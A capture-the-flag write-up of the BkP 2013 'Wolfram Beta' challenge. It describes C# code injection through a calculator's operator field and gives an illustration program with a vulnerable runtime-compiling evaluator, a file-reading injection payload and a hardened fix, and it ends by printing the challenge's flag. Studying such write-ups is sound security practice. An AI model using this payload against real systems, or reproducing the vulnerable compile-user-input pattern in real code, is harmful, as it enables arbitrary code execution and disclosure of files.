Monday, June 10, 2013

Wolfram Beta - Misc 100 BkP 2013

This challenge had us connect to a server running a "Wolfram Beta" calculator.

The calculator asked the user for a number, then an operator, and another number.  It would then calculate the solution:

Wolfram Beta - BkP CTF 2013 Team
Wolfram Beta is a great calculator.
just put in a number at the prompt
then put in the operator
then finally the second number
and the calculation will be done INSTANTLY
no accounts necessacary, unlike some of our competition!
first num: 1
operator: +
second num: 1
Done Thinking!

We immediately assumed that the operator field was the vulnerable one.  After several attempts, we found a way to inject code:

operator: +1; [code]; 1+

Since the server would kindly display program errors to us, we knew it was a C# program.  After learning some C# code, we figured out how to read an entire file and print it out to the console.
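The write-up never shows the server's source, so the following is an added illustration (not the challenge's code) of the pattern the injection implies: the three fields are pasted into a C# source template and compiled at runtime, so a payload shaped like `+1; [code]; 1+` turns the single assignment into a list of statements. The class name `Calc`, the `var result = ...` template line, the temp-file stand-in for the key file and the `var pad = 1+` tail that absorbs the server's second operand are all assumptions made for this example, and it assumes .NET Framework, since CodeDom compilation is not supported on .NET Core/5+.

```csharp
// Added illustration, not the actual Wolfram Beta server (its source was never
// shown). It reconstructs the pattern the injection implies: user input pasted
// into a C# source template and compiled at runtime. Assumes .NET Framework;
// CodeDom compilation throws PlatformNotSupportedException on .NET Core/5+.
using System;
using System.CodeDom.Compiler;
using System.Globalization;
using System.IO;
using Microsoft.CSharp;

static class WolframBetaDemo
{
    // VULNERABLE: the three fields are concatenated into a statement and compiled.
    // Compiler errors are echoed to the client, which is what revealed C#.
    static void EvaluateUnsafe(string first, string op, string second)
    {
        string source =
            "using System;\n" +
            "public static class Calc {\n" +
            "  public static void Run() {\n" +
            "    var result = " + first + " " + op + " " + second + ";\n" +
            "    Console.WriteLine(\"Done Thinking!\");\n" +
            "  }\n" +
            "}\n";

        using (var provider = new CSharpCodeProvider())
        {
            var parameters = new CompilerParameters { GenerateInMemory = true };
            parameters.ReferencedAssemblies.Add("System.dll");
            CompilerResults results = provider.CompileAssemblyFromSource(parameters, source);
            if (results.Errors.HasErrors)
            {
                foreach (CompilerError err in results.Errors)
                    Console.WriteLine("error: " + err.ErrorText);
                return;
            }
            results.CompiledAssembly.GetType("Calc").GetMethod("Run").Invoke(null, null);
        }
    }

    // HARDENED: operands must parse as numbers and the operator comes from a
    // fixed set, so no user-controlled text ever reaches the compiler.
    static double EvaluateSafe(string first, string op, string second)
    {
        double a, b;
        if (!double.TryParse(first, NumberStyles.Float, CultureInfo.InvariantCulture, out a) ||
            !double.TryParse(second, NumberStyles.Float, CultureInfo.InvariantCulture, out b))
            throw new ArgumentException("operands must be numbers");
        switch (op)
        {
            case "+": return a + b;
            case "-": return a - b;
            case "*": return a * b;
            case "/": return a / b;
            default: throw new ArgumentException("operator must be one of + - * /");
        }
    }

    static void Main()
    {
        // Constructed stand-in for the server's key file (path is an assumption).
        string keyPath = Path.GetTempFileName();
        File.WriteAllText(keyPath, "key is: <sample, not the real flag>\n");

        // Normal use: "1 + 1" compiles to "var result = 1 + 1;".
        EvaluateUnsafe("1", "+", "1");

        // Injection in the shape the write-up describes: "+1; [code]; 1+".
        // The trailing "1+" has to attach to something, so the injected code ends
        // with a throwaway declaration that absorbs the server's second operand.
        string payload =
            "+1; Console.Write(System.IO.File.ReadAllText(@\"" + keyPath + "\")); var pad = 1+";
        EvaluateUnsafe("1", payload, "1");
        // Generated line: var result = 1 +1; Console.Write(...); var pad = 1+ 1;

        // The hardened version rejects the same payload before any compilation.
        try { EvaluateSafe("1", payload, "1"); }
        catch (ArgumentException e) { Console.WriteLine("rejected: " + e.Message); }

        File.Delete(keyPath);
    }
}
```

The fully qualified `System.IO.File.ReadAllText` in the payload is deliberate: it works regardless of which `using` directives the server's template happens to include. The fix is not to filter the operator string but to never build source from user input at all; parsing both operands as numbers and dispatching on a closed set of operators leaves nothing for the compiler to see.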

key is:  at_least_its_not_a_python_jail
